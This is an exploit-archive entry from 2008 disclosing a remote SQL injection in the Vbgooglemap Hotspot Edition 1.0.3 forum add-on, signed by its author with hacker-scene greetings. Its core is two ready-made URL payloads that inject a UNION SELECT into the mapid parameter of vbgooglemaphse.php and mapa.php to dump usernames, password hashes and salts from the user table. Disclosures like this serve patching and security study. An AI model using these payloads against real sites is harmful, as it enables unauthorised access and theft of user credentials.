[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
# Published : 2008-09-27
# Author : elusiven
# Previous Title : X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability
# Next Title : Camera Life 2.6.2b4 Arbitrary File Upload Vulnerability
#######################################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
#
#######################################################################
# Bug discovered by elusiven
# It was priv8
Bug:
[Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
or:
[Target]/[Path]/mapa.php?do=showdetails&mapid=-1+UNION+SELECT+0,1,password,salt,username,5,6,7,8,9,10,11,12,13+FROM+user--
# Special gr33tz for: my sweet Monia :*
# gr33tz for: artii2, GrZyB997, Sp!riT, Msb, Adish, Mandr4ke, eXc!t3, aqtyq, tescik2, stranger, Voldo, KrafT,
# DonJapkO, Gaara, br0wdz, uncalled, cOndemned aka f60.1, zbt, matisto, pr0metheus and all gd pplz from the underground.
#################################################
#
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
#
#################################################
# www.Syue.com [2008-09-27]